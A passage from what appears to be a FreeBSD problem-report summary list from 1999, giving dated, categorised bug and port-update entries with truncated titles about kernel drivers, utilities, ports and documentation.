o [1999/01/13] kern/9474 "comcontrol rescan 0:8:0" hangs, causes o o [1999/01/14] bin/9494 new option to prevent mail from sending m o [1999/01/16] bin/9529 ftp filname completion can't handle space o [1999/01/17] bin/9536 make world installs aout compat libs in t o [1999/01/19] bin/9569 top(1) ignores tty EOF condition. o [1999/01/19] kern/9570 ed(4) irq config enhancement o [1999/01/19] bin/9573 ksrvtgt not working o [1999/01/20] misc/9582 jkh configApache command doesn't work for /st o [1999/01/20] kern/9590 Clean up for -Wall warnings o [1999/01/21] kern/9611 MFS calculates the size incorrectly when o [1999/01/22] kern/9619 Restarting mountd kills existing mounts o [1999/01/25] kern/9679 fix for uninterruptible open in portal fi o [1999/01/25] kern/9689 panic in sbdrop(kern/uipc_socket2.c) o [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. o [1999/01/27] i386/9721 Patch for FreeBSD netboot (booting via DO o [1999/01/28] kern/9748 error in queue handling of at_shutdown() o [1999/01/28] bin/9770 An openpty(3) auxiliary program o [1999/01/29] i386/9777 luigi Generic AD1816 sound suport in Luigi's pc o [1999/01/29] ports/9786 cwt tk80 port doesn't create man page links o [1999/01/30] kern/9791 enhancement for netinet/ip_icmp.c to cont o [1999/01/30] ports/9792 msmith pib coredumps in port maker mode o [1999/01/30] ports/9795 obrien The Handbook is not clear on how to deal o [1999/01/30] bin/9809 finger output format wrong f [1999/01/30] ports/9811 nectar New port: lang/gnomeguile o [1999/01/30] ports/9812 nectar New port: devel/libgtopbindings o [1999/01/31] ports/9840 asami patch allows ports to fetch their sources o [1999/01/31] conf/9845 Propose adding options to rc.conf and rc. o [1999/01/31] kern/9848 ARP proxyall extra sanity check o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/03] bin/9902 error in german (and some other) locale s o [1999/02/05] ports/9921 peter exmh2 ports update o [1999/02/06] bin/9931 config gives misleading error when duplic o [1999/02/07] ports/9954 ports New port: devel/ACE o [1999/02/08] bin/9972 groff always built for US (letter) sized o [1999/02/09] gnu/9987 jdp wrong (for FreeBSD) ELF_DYNAMIC_INTERPRET o [1999/02/09] bin/9990 Enhancement to filename completeion in cs o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/09] ports/9993 kris New Port - graphics/libunfig o [1999/02/09] ports/9998 kris New port - graphics/mtv (MpegTV player) o [1999/02/10] i386/10004 jkh instalation of current version from FTP s o [1999/02/10] ports/10007 ports Port of the mercury compiler version 0.8 o [1999/02/11] ports/10023 kris New port - net/gtkcookie o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/12] i386/10052 Matrox Millennium II AGP device/model id o [1999/02/14] docs/10085 nbm NIS Setup Tutorial o [1999/02/14] kern/10095 missing VGA description o [1999/02/15] gnu/10112 /usr/src/gnu/usr.bin/patch sorely out of o [1999/02/16] kern/10116 acd driver patch to support PD/CD drive. o [1999/02/16] ports/10124 ports UNIX|STAT pr submission failed to include o [1999/02/18] docs/10146 jkh Release Notes and LINT for 3.1 include ha o [1999/02/18] kern/10149 New PCI device o [1999/02/19] bin/10158 Reference to ncheck in quot(8) o [1999/02/19] kern/10159 Unable to unload vinum module o [1999/02/19] kern/10160 kldload of umap module panics the system o [1999/02/19] ports/10162 se Fix kdmrc to add qmail usernames to NoUse o [1999/02/19] misc/10167 Upon exiting X11R6, monitor goes blank. o [1999/02/20] bin/10169 find -perm doesn't allow a bitwise o [1999/02/20] kern/10175 Bridging support incomplete for some netc o [1999/02/21] ports/10178 torstenb USE_SOCKS=YES option broken for security/ o [1999/02/22] ports/10196 torstenb Better startup scripts for ssh o [1999/02/22] ports/10215 rvb net/coda_client and net/coda_server o [1999/02/23] ports/10227 peter wrong sendmail path in rdist6-port a [1999/02/23] misc/10231 inet_addr() doesn't check for illegal val o [1999/02/25] docs/10240 doc We need a script which check if our web m o [1999/02/25] conf/10244 100 character limit on any pathname in sy o [1999/02/25] kern/10255 Some more SiS chipset PCI IDs for chipset o [1999/02/26] bin/10274 make does not understand "lib(obj)" synta o [1999/02/26] bin/10283 Race condition in rc.network o [1999/02/28] bin/10300 dmesg exits on signal 10 o [1999/03/01] misc/10325 Implementation of itoa() for libc o [1999/03/01] bin/10342 putenv(3) unnecessarily calls strdup/free o [1999/03/01] docs/10349 phantom For long .Dt fields, rendering is broken- o [1999/03/02] misc/10351 /usr/share/examples/worm is out of date o [1999/03/02] bin/10358 ftp(1) has problems with long pathnames o [1999/03/05] ports/10396 asami SPIN is in the wrong category o [1999/03/06] kern/10440 Discard device does not set ifq_maxlen o [1999/03/06] bin/10444 avoiding lost mail when mail filesystem i o [1999/03/06] ports/10454 obrien Update: emulators/spim a [1999/03/06] kern/10455 pcaudio breakage o [1999/03/07] i386/10465 Must disable ex0 to install. o [1999/03/07] ports/10477 ports The fakemail in lib-src fails to link (ne o [1999/03/08] bin/10493 ipfw's undocumented feature o [1999/03/10] bin/10522 make world died due -Werror o [1999/03/10] bin/10524 3.1-19990309-STABLE install problem o [1999/03/10] ports/10532 ports New port: lang/gpc - GNU Pascal o [1999/03/10] bin/10538 sbin/nos-tun gives wrong usage message o [1999/03/11] bin/10546 imp Intel Pro/100 PC card has CIS string > CI o [1999/03/11] bin/10548 More useful default ifconfig behaviour sa o [1999/03/12] gnu/10555 jraynard [PATCH] awk dumps core o [1999/03/12] kern/10563 QIC 40/80 tape drive ft present in versio o [1999/03/13] kern/10574 3.1-stable kernel reports k6 cpu as "\^E" o [1999/03/14] conf/10582 Makefile.upgrade fails with make -j o [1999/03/14] misc/10589 Incorrect assumptions in /etc/security o [1999/03/14] bin/10590 new option to silince confirmation but no o [1999/03/15] bin/10601 wosch Ownership of symlinks copied by adduser a o [1999/03/15] i386/10606 Probablue odd error message if LS-120 is o [1999/03/15] i386/10608 add Opti Viper-M PCI ID o [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10610 New options to date to slowly adjust time o [1999/03/15] bin/10611 timed enhancement o [1999/03/16] bin/10622 vi does not display Russian characters pr o [1999/03/16] i386/10623 DFLTPHYS in /usr/src/sys/i386/include/par o [1999/03/16] ports/10634 ports Update the hylafax port to do a client in o [1999/03/17] ports/10639 rse ports/web/wml must be upgraded and unbrok o [1999/03/17] kern/10641 Default sync rate in ncr SCSI driver is s o [1999/03/17] kern/10642 exports(5) mentions KERBNFS but that's no o [1999/03/18] bin/10657 Unable to install from CDROM or DOS parti o [1999/03/18] kern/10663 hpscan doesn't like 3.1's pt device o [1999/03/18] misc/10667 Sysinstall inserts multiple # -- sysinsta o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 wpaul Non-ASCII chars on serial console with Re o [1999/03/19] kern/10678 Printing problems using ppc bus o [1999/03/19] ports/10682 asami List mirror sites in MASTER_SITE_BACKUP - o [1999/03/22] kern/10728 sos WCD driver does not recognize a recovered o [1999/03/22] ports/10734 pst Update of gdb port to 4.17 o [1999/03/23] kern/10755 de driver says `invalid EESPROM checksum' o [1999/03/23] i386/10766 obsolete device name wcd is still left un o [1999/03/24] i386/10779 zp slot 0 sees 3Com 589 PCMCIA card but z o [1999/03/25] bin/10793 cvs update modification time check granul o [1999/03/26] misc/10803 joe whois(1) client enchancements a [1999/03/26] misc/10804 joe whois(1) enhancement o [1999/03/26] ports/10806 phk Update net/scotty to 2.1.10 o [1999/03/26] kern/10812 LINT configuration MAXDSIZ/DFLDSIZ mislea o [1999/03/26] ports/10813 ports crossgo32 brokeness o [1999/03/27] bin/10825 daily script not executed or executed twi f [1999/03/28] ports/10844 ports New port: adagdb o [1999/03/29] docs/10850 doc submitting a documentation change for sed o [1999/03/29] bin/10856 vty's from ttyvc - ttvf (maybe more?) do o [1999/03/30] bin/10868 BUG in /usr/bin/calendar o [1999/03/30] misc/10871 wst0 fails with Sony SuperStation streami o [1999/03/30] bin/10878 host(1) dumps core o [1999/03/31] kern/10894 wrong error message in svctcp_create() o [1999/04/01] bin/10905 sa(8) is hard coded for 8 character user o [1999/04/01] gnu/10910 Integration of Objective C patches into g o [1999/04/02] ports/10916 ports New port: biology/molmol o [1999/04/02] bin/10923 /usr/bin/cpp is an out-of-date wrapper fo o [1999/04/02] bin/10924 Extensions to biff(1) o [1999/04/03] bin/10931 biff b o [1999/04/04] ports/10945 jmz X11 "sessreg" program does not update /va o [1999/04/06] bin/10980 With ctags -x no space is left between na o [1999/04/07] docs/10997 doc Problem with query-pr-summary.cgi o [1999/04/07] i386/11006 Sysinstall silently makes FreeBSD's parti o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] ports/11029 ports Configure scripts for non ported applicat o [1999/04/08] bin/11031 [PATCH] mount and umount support for mort o [1999/04/08] bin/11032 h2ph's cpp #warning/#error directive proc o [1999/04/08] ports/11034 ports New port: www/crazywwwboardle o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/08] bin/11037 Gencat doesn't properly handle \ddd octal o [1999/04/09] ports/11048 obrien variable not initialized in fwtk-lib lead o [1999/04/09] bin/11051 ps's -U option should accept a list of us o [1999/04/09] misc/11052 [PATCH] performance bug fix to fgets() ro o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/11] bin/11094 lastlogin.8 from NetBSD o [1999/04/12] kern/11109 ipfw.ko Makefile contains CFLAGS+= -DDIVE o [1999/04/13] misc/11111 Error opening terminal: su o [1999/04/13] bin/11114 make(1) does not work as documented with o [1999/04/13] misc/11126 vt100 termcap entry appears broken o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/14] ports/11138 jmz New version of Xevil 2.01, I created a po o [1999/04/14] bin/11141 u_long is not big enough o [1999/04/15] misc/11149 phantom Web page entry for BAFUG is incorrect o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 o [1999/04/16] bin/11168 pw(8) usermod does not recognize -w flag o [1999/04/16] kern/11178 [PATCH] minor fix to /usr/include/sys/mbu o [1999/04/18] i386/11201 brian mktime possible bug o [1999/04/18] bin/11205 Suggestion: move mt(1) to /bin o [1999/04/18] i386/11207 sys/i386/isa/rp.c: fixed breaking and war o [1999/04/19] kern/11222 MFS does not sync from reboot syscall o [1999/04/20] kern/11235 Need to submit new driver o [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] conf/11243 mountd startup can lose flags o [1999/04/20] bin/11248 Shuffle o [1999/04/21] docs/11258 doc suggestion to refine npx.4 o [1999/04/22] kern/11287 rfork(RFMEM...) doesn't share LDTs set by o [1999/04/22] misc/11289 makeflp.bat suggestion: create "kernel" d o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/04/25] misc/11316 jkh [PATCH] HTTP proxy support for sysinstall o [1999/04/27] ports/11353 asami Feature additions to bsd.port.mk. o [1999/04/27] bin/11360 Allow specification of "search" in resolv o [1999/04/28] kern/11365 plip in Linux mode has trouble with some o [1999/04/28] bin/11370 more segfaults if you give it a real file o [1999/04/29] misc/11383 $Id$ missing in some files in etc [PATCH] o [1999/04/29] bin/11387 mount_cd9660 doesn't show rockridge filen o [1999/04/29] ports/11388 torstenb patch for ircII so /window create works o [1999/04/29] bin/11399 Calendar doesn't always handle 'last' day o [1999/04/30] kern/11410 code typo in ad1848.c: the != operator ha o [1999/04/30] kern/11411 code typo in clones.c: "if ((mpu_config = o [1999/04/30] kern/11412 code typo in ip_fil.c: missing NULL check o [1999/04/30] kern/11413 code typo in pci.c: the != operator has h o [1999/04/30] kern/11414 code typo in pcf.c: the != operator has h o [1999/04/30] kern/11415 code typo in wst.c: the != operator has h o [1999/04/30] kern/11416 code typo in sequencer.c: "if (!processed o [1999/04/30] ports/11421 jfitz upgrade p5-Date-Manip 5.33 -> 5.34 o [1999/05/01] ports/11430 se incorrect int type causes floating point o [1999/05/02] misc/11448 Better looking VGA font for iso2 o [1999/05/02] ports/11460 erich Update to the xlispstat port o [1999/05/03] misc/11478 Non-functional AFS support in KerberosIV o [1999/05/04] ports/11504 chuckr Update ports math/octave o [1999/05/05] ports/11510 nik new version of www/sitecopy (0.6.0) o [1999/05/05] kern/11516 NetGear 10/100 Ethernet 21140-based Ether o [1999/05/05] kern/11517 ../../kern/kern_ntptime.c:533: warning: i o [1999/05/05] kern/11518 ../../pci/if_tx.c:1376: warning: no previ o [1999/05/05] kern/11519 dead code in ncr driver o [1999/05/06] bin/11552 sendmail local delivery (mail.local) can' o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/07] misc/11569 Automatically run fsck when the file syst o [1999/05/09] bin/11608 vnconfig not supporting swap-backed vn de o [1999/05/09] bin/11609 vnconfig -v reports page numbers, not byt s [1999/05/09] ports/11611 billf Update port: net/ntop o [1999/05/10] bin/11623 quot uses 32-bit integers for its calcula o [1999/05/10] conf/11626 /var/log/kerberos is rotated o [1999/05/10] bin/11637 build of kdump fails o [1999/05/11] ports/11652 ports New port: net/dictd o [1999/05/12] bin/11669 gcc 2.7.2.1 gets bad magic error linking o [1999/05/12] bin/11671 "vidfont -r" fails, asking for font size o [1999/05/12] i386/11674 can't do make imake build or anything sin o [1999/05/12] kern/11676 PCIless kernel will not compile with ATAP o [1999/05/13] i386/11683 olpt/nlpt name change not in man pages o [1999/05/13] misc/11689 Change "netstat" mode in daily "status-ne o [1999/05/17] ports/11743 torstenb inn-2.2 (nonfatal) premature stop of buil o [1999/05/17] bin/11746 Add support for Solaris mailboxes o [1999/05/18] kern/11765 performance bug: network devices fxp & de o [1999/05/18] misc/11767 sppp does not implement VJ compression o [1999/05/19] ports/11786 kuriyama gnupg-0.9.6 port does not install o [1999/05/19] kern/11789 ELF machine definition missing for ARM o [1999/05/21] bin/11818 Added a feature to ping(8) o [1999/05/21] ports/11820 asami bsd.port.subdir.mk does not define the `m o [1999/05/21] i386/11829 Boot Failure (Register Dump) with MFSroot o [1999/05/22] misc/11838 xwindows configuration problem o [1999/05/22] ports/11840 asami Feature fixup: bsd.port.mk o [1999/05/24] ports/11879 ports dclock's "-miltime" option and "*miltime" o [1999/05/24] kern/11881 when a dummynet pipe is encountered it st o [1999/05/25] misc/11890 make world creates /lkm directory o [1999/05/26] bin/11896 cap_mkdb dumps core when non-files passe o [1999/05/26] i386/11898 Connot wirte to floppy on HP OB800CT with o [1999/05/26] bin/11900 Sed(1) fails with MALLOC_OPTIONS set to ' o [1999/05/27] conf/11905 sysinstall desktop changing inconvenience o [1999/05/28] bin/11914 makewhatis during installworld uses /usr/ o [1999/05/28] i386/11920 FBSD 3.2 upgrade claims not to upgrade /u o [1999/05/28] i386/11921 /usr/X11R6/lib/aout libraries screwed up o [1999/05/29] conf/11925 rc.conf cosmetic naming inconsistencies o [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/05/29] kern/11941 FreeBSD box reboots itself when changing o [1999/05/30] kern/11945 tape problems on -stable, mt bl(ocksize), o [1999/05/31] ports/11963 ports should update the ocaml-tk module and ins o [1999/05/31] ports/11964 jmacd lang/STk port needs to be updated to STk- o [1999/05/31] kern/11968 kldload should call module entry point be o [1999/06/01] docs/11978 doc timed(8) manpage does not define '-F' swi o [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/01] kern/11981 brian access to tunN devices not allowed to non o [1999/06/02] conf/11989 pppd(8) output misplaced s [1999/06/02] bin/11997 Enhancement for lpr o [1999/06/02] ports/12001 ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/03] ports/12013 ports patch for 12012 o [1999/06/03] kern/12014 Fix SysV Semaphore handling o [1999/06/04] conf/12026 /etc/rc.diskless1 refrences non-existant o [1999/06/05] misc/12044 having tcl.h in /usr/local/include:/usr/i o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor a [1999/06/06] bin/12052 sh type builtin appends first path compon o [1999/06/06] kern/12053 fixes a few aio bugs, makes socket io bet o [1999/06/06] ports/12056 ache [PATCH] hpack install files always in /us o [1999/06/06] ports/12057 markm Perl5 library builds do not honour PREFIX o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/09] kern/12095 [PATCH] Buggy ATAPI Zip Drive is not dete o [1999/06/09] bin/12107 Add switch to dump to support multiple du o [1999/06/10] i386/12113 ESS1688 support for VoxWare sound driver o [1999/06/10] bin/12115 pppd reports wrong connected duration wit o [1999/06/13] ports/12188 ports New port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195 ports New port: pgpenvelope o [1999/06/14] ports/12204 ports Update port: graphics/EZWGL o [1999/06/15] misc/12228 phantom /etc/security don't search in all the fil o [1999/06/16] gnu/12238 bc 1.04 crashes with long formula typed i o [1999/06/16] kern/12241 jkh Req: GENERIC includes bpf device o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/17] bin/12255 BIND 8.1.2 compilation error in IPv6 capa o [1999/06/17] bin/12263 hoek "more" problems with long filenames o [1999/06/18] ports/12271 ports fix pkg_add with error message and add ne o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/18] kern/12281 active-filter option in pppd doesn't stop o [1999/06/20] bin/12308 LPD can't be told not to bind to a TCP po o [1999/06/21] conf/12324 jkh Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 asami Adds refetch functionallity to bsd.port.m o [1999/06/21] i386/12326 wdc flag 0x1000 (LBA addressing) prevents o [1999/06/21] kern/12333 ProAudio Spectrum sound card broken model o [1999/06/21] kern/12334 Some ProAudio SPectrum cards do not do DM o [1999/06/21] kern/12335 if_pn.c lacks bridging support; patch enc o [1999/06/22] conf/12342 /etc/hosts.allow must use numerical IP ad o [1999/06/22] bin/12357 [PATCH] allow route to create "proxy only o [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/23] ports/12366 billf finish the port for misc/mprime o [1999/06/23] ports/12368 ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/23] bin/12375 mv(1) cannot inherit the file flags. o [1999/06/24] i386/12383 make release warns about /dev entries mak o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/06/26] ports/12403 ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406 ports New port for the LAM implementation of th o [1999/06/27] kern/12409 add some more chipset models by NVidia to o [1999/06/27] bin/12421 sysinstall label fails o [1999/06/28] conf/12432 empty amd_flags causes start failure in r o [1999/06/30] bin/12461 it's handy to be able to send syslog mess o [1999/06/30] bin/12467 wollman ac(8) does not accept input from stdin o [1999/07/01] bin/12477 New fortune o [1999/07/02] docs/12486 mpp listing of (56) utilities in /bin:/sbin:/ o [1999/07/02] bin/12489 /sbin/route exits with 0 on some errors o [1999/07/02] ports/12490 ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492 ports port misc/diction should be moved to text o [1999/07/03] kern/12495 3.1 install fails to detect Toshiba CDROM o [1999/07/03] ports/12503 ports New port: Willows toolkit (developers rel o [1999/07/04] ports/12515 jfitz p5-Apache/scripts/install_httpd needs fix o [1999/07/05] ports/12518 ports New port: ifmail-os-2.14.7 o [1999/07/05] ports/12522 ports New port: cos o [1999/07/05] ports/12523 ports New port: jdbcpool o [1999/07/05] bin/12528 [PATCH] tip's "tipout" child doesn't alwa o [1999/07/06] ports/12530 peter squid22 port with --enable-ipf-transparen o [1999/07/06] ports/12536 ports New port: lang/cu-prolog o [1999/07/06] kern/12543 [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 kldload(8) should be more sensitive to er o [1999/07/07] ports/12548 asami New 'fecth-recursive(-list)' targets in p o [1999/07/07] ports/12549 ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571 ports Xfig port doesn't have Ghostscript suppor f [1999/07/11] ports/12596 torstenb pidentd is unstable in 3.2 and 4.0 o [1999/07/11] ports/12604 peter New port version: transproxy 1.0 o [1999/07/12] kern/12609 At boottime NFS mounts on a 3.2 client fr s [1999/07/12] bin/12611 sheldonh /usr/bin/jot crashes with floating point o [1999/07/12] misc/12612 ncurses ash shipped with 3.2-R missing sy o [1999/07/12] ports/12618 ache poor trouble reporting by qpopper's pop_i o [1999/07/13] ports/12624 ports New version of mxv which also works with o [1999/07/13] misc/12633 CMI8330 chip based integrated sound card o [1999/07/15] ports/12654 pst gnats port failes on "make install" o [1999/07/15] kern/12655 Kernel config file needs more commenting o [1999/07/15] ports/12656 ports New port: gnujsp o [1999/07/16] ports/12666 ports New port: kcd-4.7.10 o [1999/07/16] kern/12668 The kernel clock goes slow with PLIP devi o [1999/07/16] ports/12674 nik textproc/docproj port has an invalid depe o [1999/07/16] ports/12675 chuckr [PATCH] textproc/sp port installs config. o [1999/07/18] kern/12697 Out of swap handling [PATCH] o [1999/07/18] ports/12699 ports New port: gnofin-0.5.10 o [1999/07/18] ports/12700 jmz Errors in mtools.conf file o [1999/07/20] bin/12712 release/Makefile: mounting /some/dir with o [1999/07/20] ports/12721 brian Leafnode 1.9.4 has enhancements and bug f o [1999/07/20] ports/12722 ports New port: AT&T's DjVu library for scanned o [1999/07/20] kern/12723 Unnecessary use of magic numbers in F_[SG o [1999/07/20] ports/12725 ache Doing a 'make install' for bash2 gets ins o [1999/07/20] ports/12726 jfitz p5-Pg fixed o [1999/07/21] ports/12737 jfitz regex for checking load avergaes is wrong o [1999/07/21] ports/12739 ports New port: AT&T's DjVu Netscape plug-in o [1999/07/22] ports/12761 wosch sysutils/stat doesn't terminate buffer an o [1999/07/22] kern/12764 luigi Patch for using x11amp with voxware (stol o [1999/07/22] misc/12765 cable problem: link down for de0 NICs. o [1999/07/22] bin/12768 billf Compilation warning for fortune.c o [1999/07/22] kern/12770 mount_msdos causes panic: kmem_malloc(134 o [1999/07/23] misc/12776 Add PAM hooks to rlogind and rshd f [1999/07/23] bin/12782 sheldonh xntpd doesn't handle interface aliases pr o [1999/07/24] ports/12787 obrien port of GNU helloworld o [1999/07/24] bin/12789 Confusing error msg when dumping a filesy s [1999/07/25] bin/12801 sheldonh nvi infinite recursion with options "left o [1999/07/25] kern/12803 obrien patch to make xe driver's noise configura o [1999/07/25] bin/12806 `sh -e' doesn't parse multi-command lines o [1999/07/27] kern/12833 Support for TI1225 PCI to CardBus Bridge o [1999/07/27] ports/12835 ports New port: libcgic-1.06 o [1999/07/27] ports/12836 jfitz p5-Apache port mod_perl part is out of da o [1999/07/28] kern/12855 panic:softdep_flushfiles:looping, caused o [1999/07/28] ports/12864 ache update: less-340 a [1999/07/28] bin/12866 sheldonh [PATCH] RFE for /bin/ls to add a -n optio o [1999/07/30] misc/12887 Problem with "top" command in SMP o [1999/07/30] misc/12888 strange kernel messages when copying file o [1999/07/30] ports/12890 obrien nmap seems to break under certain conditi o [1999/07/30] ports/12891 torstenb Please update converters/recode to 3.5 o [1999/07/31] kern/12896 Incorrect CPU model display at boot time o [1999/07/31] bin/12898 Added a command-line switch to netstat to o [1999/07/31] ports/12899 ports New port: wmnet-new o [1999/07/31] ports/12903 ports new ports/database/p5-* o [1999/07/31] ports/12904 taoka new ports/devel/gperf o [1999/08/01] ports/12915 ports Add elm 2.5 to ports o [1999/08/01] ports/12916 wosch Update Checkbot to 1.56 o [1999/08/02] docs/12933 n_hibma sio.4 misses description of 0x0080 flag o [1999/08/02] ports/12934 ache procmail 3.13 port doesn't have "install- o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/03] bin/12942 m4: len(`') returns `' a [1999/08/03] kern/12943 dg fxp driver not completely compatible with o [1999/08/03] bin/12946 top(1) gives incorrect delay default o [1999/08/04] ports/12952 asami make _PORT_USE touch cookies by variable, o [1999/08/04] bin/12957 rpc.rusersd dumps core with signal 11 whe o [1999/08/04] bin/12960 des basename(3) and dirname(3) o [1999/08/04] bin/12962 des basename(3) and dirname(3) part 2 o [1999/08/04] kern/12966 receiver lockups in vr0 driver o [1999/08/05] bin/12982 last does not support -y option. o [1999/08/05] misc/12983 system hang accessing mounted msdos flopp o [1999/08/05] misc/12992 sector size independent patch for msdosfs o [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/05] docs/12994 hoek Update to getopt.3 to agree with style.9 o [1999/08/06] bin/13000 vi core dumped o [1999/08/06] ports/13006 erich update emulators/x48 to 0.4.1d o [1999/08/07] conf/13016 Wrong sendmail.cf file used by mergemaste o [1999/08/07] docs/13020 mpp Manpage capitalization o [1999/08/08] docs/13034 peter incorrect (old/obsolete) manpage for name o [1999/08/08] misc/13036 de doesn't work with DEC 21143 based PCI o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/09] i386/13051 after installation on system using COM1, o [1999/08/10] kern/13062 lnc ethernet xmit underflow problem o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/11] docs/13079 mpp new man page describing timeradd() family o [1999/08/11] kern/13082 dfr Improved support for NE2000 PnP cards o [1999/08/11] misc/13089 jkh sysinstall repeatedly installs a distribu o [1999/08/12] bin/13092 des Fetch doesn't default to the correct http o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/13] docs/13116 jdp typo in ms(7) o [1999/08/13] misc/13117 peter CVS repo src/lib/libc_r/uthread incorrect o [1999/08/13] ports/13124 ports New port: LinAlg; request for local hosti o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna o [1999/08/13] ports/13129 torstenb Postfix Port Ignores MANPREFIX o [1999/08/15] kern/13161 alfred mounting on top of a mounted file system o [1999/08/15] kern/13164 kthread_exit stops, but doesn't release p o [1999/08/15] ports/13167 torstenb [PATCH] security/ssh package keygen fails o [1999/08/15] i386/13171 "config" not quite right for kernel not n o [1999/08/16] ports/13173 ports New port: yiff-0.33 o [1999/08/16] misc/13185 "tengo problemas con el pop3" o [1999/08/17] ports/13191 ports New port: fire-1.0 o [1999/08/17] ports/13201 ports New port: xmess (X11 emulator for game co o [1999/08/17] kern/13209 IPFILTER_DEFAULT_BLOCK not in /usr/src/sy o [1999/08/17] docs/13211 chris [LIST] Some man pages has references to n o [1999/08/17] kern/13215 ALPS GlidePoint in Sony Z505 not recogniz o [1999/08/18] docs/13218 mpp Many manpages still not conformed mdoc(7) o [1999/08/18] kern/13220 mkdep: compile failed - ../../pci/if_de.c o [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque s [1999/08/18] bin/13235 mpp allow preprocessing with tbl(1) for nroff o [1999/08/18] conf/13249 sysinstall not installing from a local ft o [1999/08/18] ports/13251 ports New port: founts-11 s [1999/08/19] kern/13252 niced jobs don't behave really nice o [1999/08/19] bin/13254 yp_all error messages have wrong text o [1999/08/20] misc/13266 Removal of #defines and addition of const o [1999/08/20] ports/13267 ports New port: glasteroids-1.0 o [1999/08/20] bin/13278 rogue: killed by fire corrupts score file o [1999/08/20] misc/13282 partial compliance of dlopen to the Singl o [1999/08/21] ports/13291 ports New port: xap-xwf-0.7.8 o [1999/08/21] bin/13309 Fixes to nos-tun o [1999/08/22] misc/13326 additional timeval interfaces for 512MB o [1999/09/21] ports/13887 taoka New port (fmirror) o [1999/09/22] misc/13895 nonexistent words in /usr/share/dict/web2 o [1999/09/22] ports/13898 obrien New port: misc/dictd o [1999/09/22] conf/13907 dummynet.4 correction, rc addition of s [1999/09/22] bin/13909 sheldonh /etc/security problems: IPFIREWALL and pa o [1999/09/22] docs/13914 doc global(1) manpage does not explain -v opt o [1999/09/23] conf/13916 mpp man outputs footer only page as first pag o [1999/09/23] conf/13918 Termcap entries for VESA modes missing o [1999/09/23] gnu/13921 awk -v var=val coredump o [1999/09/23] kern/13924 sb/snd driver broken under 4.0-19990918-C f [1999/09/24] gnu/13935 ru FreeBSD uses an obsolete version of grep o [1999/09/24] i386/13936 No clear indictaion of how much space to o [1999/09/25] docs/13950 doc webpage idea o [1999/09/25] ports/13952 se update emulators/wine to 990923 (supersed o [1999/09/25] docs/13967 doc FreeBSD Related Publications in Korea o [1999/09/26] kern/13979 [PATCH] add serial number to IDE HD probe o [1999/09/26] ports/13986 ports New port: sysutils/gnometoaster o [1999/09/26] gnu/13989 SIGWINCH corrupts the display of a multil o [1999/09/27] kern/14006 pas2_pcm.c pcm playback problem, with fix o [1999/09/28] docs/14024 doc Several manpages still mentions hosts.den o [1999/09/29] docs/14035 doc tzfile.h referenced in tzfile(5) doesn't o [1999/09/29] bin/14040 amd has wrong uname data compile in it o [1999/09/30] i386/14048 ``doscmd -r'' doesn't work o [1999/09/30] ports/14052 ports fvwm95-i18n - missing dependence to fbsd- o [1999/09/30] ports/14070 ports g2c libraries and compatibility for DJGPP o [1999/09/30] i386/14071 FreeBSD 3.3 Installation CD does not boot o [1999/10/01] docs/14074 grog vinum(8) manpage gets warning 2.24.2 o [1999/10/31] kern/14634 Mixer synth & mixer CD seem to be swapped o [1999/10/31] kern/14639 convert proc.p_peers to a queue(3) LIST o [1999/11/01] ports/14643 ports A Chinese/English dictionary o [1999/11/01] ports/14644 ports A Big5-localized & XIM-enabled XEmacs por o [1999/11/01] kern/14646 kern.boottime affected by APM suspend/res o [1999/11/01] bin/14648 markm `make world' now requires -DNOCRYPT in my o [1999/11/01] ports/14652 se update emulators/wine to 991031 (supersed o [1999/11/02] ports/14663 ports aspell-.27.2 port doesn't read dictionari o [1999/11/02] gnu/14664 tar checks for volno-file even if it shou o [1999/11/02] 